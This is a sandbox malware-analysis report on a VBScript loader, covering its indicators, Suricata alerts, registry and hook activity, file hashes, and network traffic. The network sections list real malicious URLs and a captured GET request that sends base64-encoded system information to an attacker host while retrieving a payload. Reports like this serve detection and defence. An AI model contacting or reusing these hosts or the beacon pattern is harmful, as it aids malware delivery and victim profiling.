MSG_956133.vbs
This report is generated from a file or URL submitted to this webservice on March 26th 2020 13:59:56 (UTC)
Guest System: Windows 7 32 bit, Professional, 6.1 (build 7601), Service Pack 1
Report generated by Falcon Sandbox v8.30 © Hybrid Analysis
Incident Response
Risk Assessment
- Network Behavior
- Contacts 2 domains and 2 hosts.
MITRE ATT&CK™ Techniques Detection
Indicators
Not all malicious and suspicious indicators are displayed.
-
Malicious Indicators 4
-
External Systems
-
Detected Suricata Alert
- details
- Detected alert "ETPRO MALWARE Unk.VBSLoader Retrieving Payload" (SID: 2841137, Rev: 1, Severity: 1) categorized as "A Network Trojan was detected" (PUA/PUP/Adware)
- source
- Suricata Alerts
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 8/58 Antivirus vendors marked sample as malicious (13% detection rate)
- source
- External System
- relevance
- 8/10
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "93.188.2.54": ...
URL: http://preduzetnik.rs/yn.php (AV positives: 4/76 scanned on 03/26/2020 12:11:37)
URL: http://pomark.se/staple/444444.png?uid= (AV positives: 4/76 scanned on 03/26/2020 11:27:31)
URL: http://etnoselozabran.com/wp-content/zon/6c962/ (AV positives: 10/77 scanned on 03/26/2020 09:53:20)
URL: http://pomark.se/staple/444444.png (AV positives: 3/76 scanned on 03/26/2020 07:24:10)
URL: http://pomark.se/staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA (AV positives: 3/76 scanned on 03/26/2020 05:16:03)
- source
- Network Traffic
- relevance
- 10/10
-
Hiding 1 Malicious Indicators
-
Suspicious Indicators 6
-
Anti-Reverse Engineering
-
Possibly checks for known debuggers/analysis tools
- details
- Matched strings omitted (Indicator: "ntice")
- source
- File/Memory
- relevance
- 2/10
-
External Systems
-
Detected Suricata Alert
- details
- Detected alert "ET INFO TLS Handshake Failure" (SID: 2029340, Rev: 2, Severity: 2) categorized as "Potentially Bad Traffic"
- source
- Suricata Alerts
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
- 3/71 reputation engines marked "http://closed.loopia.com" as malicious (4% detection rate)
- source
- External System
- relevance
- 10/10
-
Installation/Persistence
-
Executes a Visual Basic script
- details
- Process "wscript.exe" with commandline ""C:\MSG_956133.vbs""
- source
- Monitored Target
- relevance
- 10/10
-
Loads the task scheduler COM API
- details
-
"wscript.exe" loaded module "%WINDIR%\System32\taskschd.dll" at 73780000
"wscript.exe" loaded module "%WINDIR%\System32\taskschd.dll" at 00900000
- source
- Loaded Module
- relevance
- 5/10
- ATT&CK ID
- T1168
-
Network Related
-
Sends traffic on typical HTTP outbound port, but without HTTP header
- details
-
TCP traffic to 93.188.2.54 on port 80 is sent without HTTP header
TCP traffic to 93.188.1.220 on port 443 is sent without HTTP header
- source
- Network Traffic
- relevance
- 5/10
-
Informative 11
-
General
-
Contacts domains
- details
-
"pomark.se"
"closed.loopia.com"
- source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
-
"93.188.2.54:80"
"93.188.1.220:443"
- source
- Network Traffic
- relevance
- 1/10
-
Loads the .NET runtime environment
- details
- "wscript.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll" at 6B340000
- source
- Loaded Module
-
Logged script engine calls
- details
-
"wscript.exe" called "Msxml2.DOMDocument.3.0.CreateObject" ...
"wscript.exe" called "ADODB.Stream.6.0.CreateObject" ...
"wscript.exe" called "WScript.Shell.1.CreateObject" ...
- source
- API Call
- relevance
- 10/10
-
Overview of unique CLSIDs touched in registry
- details
-
"wscript.exe" touched "VB Script Language" (Path: "HKCU\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}")
"wscript.exe" touched "Constructor that allows hosts better control creating scriptlets" (Path: "HKCU\CLSID\{06290BD1-48AA-11D2-8432-006008C3FBFC}")
"wscript.exe" touched "XML DOM Document 3.0" (Path: "HKCR\SOFTWARE\CLASSES\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}")
"wscript.exe" touched "ADODB.Stream" (Path: "HKCU\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\TREATAS")
"wscript.exe" touched "Multi Language Support" (Path: "HKCU\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\TREATAS")
"wscript.exe" touched "Windows Script Host Shell Object" (Path: "HKCU\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\TREATAS")
"wscript.exe" touched "Server XML HTTP 6.0" (Path: "HKCU\CLSID\{88D96A0B-F192-11D4-A65F-0040963251E5}\TREATAS")
"wscript.exe" touched "WinHttpRequest Component version 5.1" (Path: "HKCU\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\TREATAS")
"wscript.exe" touched "Wbem Scripting Object Path" (Path: "HKCU\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\TREATAS")
"wscript.exe" touched "WBEM Locator" (Path: "HKCU\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\TREATAS")
"wscript.exe" touched "WbemDefaultPathParser" (Path: "HKCU\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\TREATAS")
"wscript.exe" touched "Windows Management and Instrumentation" (Path: "HKCU\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\TREATAS")
"wscript.exe" touched "PSFactoryBuffer" (Path: "HKCU\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\TREATAS")
"wscript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IWbemServices" (Path: "HKCU\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TREATAS")
"wscript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject" (Path: "HKCU\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TREATAS")
"wscript.exe" touched "System.Text.UnicodeEncoding" (Path: "HKCU\CLSID\{A0F5F5DC-337B-38D7-B1A3-FB1B95666BBF}\TREATAS")
"wscript.exe" touched "XML DOM Document" (Path: "HKCU\CLSID\{2933BF90-7B36-11D2-B20E-00C04F983E60}\TREATAS")
"wscript.exe" touched "TaskScheduler class" (Path: "HKCU\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\TREATAS")
- source
- Registry Access
- relevance
- 3/10
-
Installation/Persistence
-
Touches files in the Windows directory
- details
-
"wscript.exe" touched file "%WINDIR%\System32\wscript.exe"
"wscript.exe" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
"wscript.exe" touched file "C:\Windows\System32\msxml3r.dll"
"wscript.exe" touched file "C:\Windows\System32\wshom.ocx"
"wscript.exe" touched file "C:\Windows\System32\msxml6r.dll"
"wscript.exe" touched file "C:\Windows\System32\wbem\wbemdisp.tlb"
"wscript.exe" touched file "C:\Windows\System32\stdole2.tlb"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"wscript.exe" touched file "C:\Windows\System32\taskschd.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"wscript.exe" touched file "C:\Windows\System32\WScript.exe.config"
- source
- API Call
- relevance
- 7/10
-
Network Related
-
Found potential URL in binary/memory
- details
-
Heuristic match: "pomark.se"
Heuristic match: "GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: SonyHD
Host: pomark.se"
Heuristic match: "closed.loopia.com"
- source
- File/Memory
- relevance
- 10/10
-
HTTP request contains Base64 encoded artifacts
- details
- "Microsoft Windows 7 Professional "
- source
- Network Traffic
- relevance
- 7/10
- ATT&CK ID
- T1132
-
Spyware/Information Retrieval
-
Found a reference to a known community page
- details
- Matched strings omitted (Indicator: "twitter")
- source
- File/Memory
- relevance
- 7/10
-
System Security
-
Creates or modifies Windows services
- details
- "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS")
- source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"wscript.exe" wrote bytes "778f79b3" to virtual address "0x6DB21FFC" (part of module "MSCORWKS.DLL")
"wscript.exe" wrote bytes "fae62d77e1a632772e713277ee29327785e22d776da0327726e42d77d16d3277003d3077804b307700000000ad3751758b2d5175b641517500000000" to virtual address "0x74661000" (part of module "WSHTCPIP.DLL")
"wscript.exe" wrote bytes "c04e307720543177e0653177b53832770000000000d0c97500000000c5eac9750000000088eac97500000000e968337582283277ee29327700000000d2693375000000007dbbc9750000000009be337500000000ba18c97500000000" to virtual address "0x760F1000" (part of module "NSI.DLL")
"wscript.exe" wrote bytes "e7392e77e1a632772e713277ee29327785e22d776da03277906431773ad5387726e42d77d16d3277003d3077804b307700000000ad3751758b2d5175b641517500000000" to virtual address "0x74B91000" (part of module "WSHIP6.DLL")
- source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179
File Details
MSG_956133.vbs
- Filename
- MSG_956133.vbs
- Size
- 949KiB (971892 bytes)
- Type
- script vbs
- Description
- ASCII text, with very long lines
- Architecture
- WINDOWS
- SHA256
- 0747701b08bc3d938a7db4a9701fe890edee079754e6834a50e6ba527b6ff7a1
- MD5
- 975b6b36cd771e5e34c0f14a5d5dccb2
- SHA1
- ed6dfa8ae74a039d5e813e21b0c7bf15b973d5f0
- ssdeep
- 12288:KOCkANly9B96o+I8rH/XS7TVfRoNL8tUA5GBTdWtT+AIbHHvg:KOGQ9B9n+IkfXSl+NL8tUEyWt+AQPg
Hybrid Analysis
Analysed 1 process in total.
- wscript.exe "C:\MSG_956133.vbs" (PID: 1008)
Network Analysis
DNS Requests
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details
---|---|---|---
93.188.2.54 | 80 TCP | wscript.exe (PID: 1008) | Sweden
93.188.1.220 | 443 TCP | wscript.exe (PID: 1008) | Sweden
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | Request headers
---|---|---|---
93.188.2.54:80 (pomark.se) | GET | pomark.se/staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA | GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1; Connection: Keep-Alive; Accept: */*; Accept-Language: en-us; User-Agent: SonyHD; Host: pomark.se
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
93.188.1.220 -> local:50241 (TCP) | Potentially Bad Traffic | ET INFO TLS Handshake Failure | 2029340 |
local -> 93.188.2.54:80 (TCP) | A Network Trojan was detected | ETPRO MALWARE Unk.VBSLoader Retrieving Payload | 2841137 |
Extracted Strings
Extracted Files
No significant files were extracted.
Notifications
-
Runtime
- Although all strings were processed, some are hidden from the report in order to reduce the overall size
- Enforcing malicious verdict, as a reliable source indicates high confidence
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "api-64" are available in the report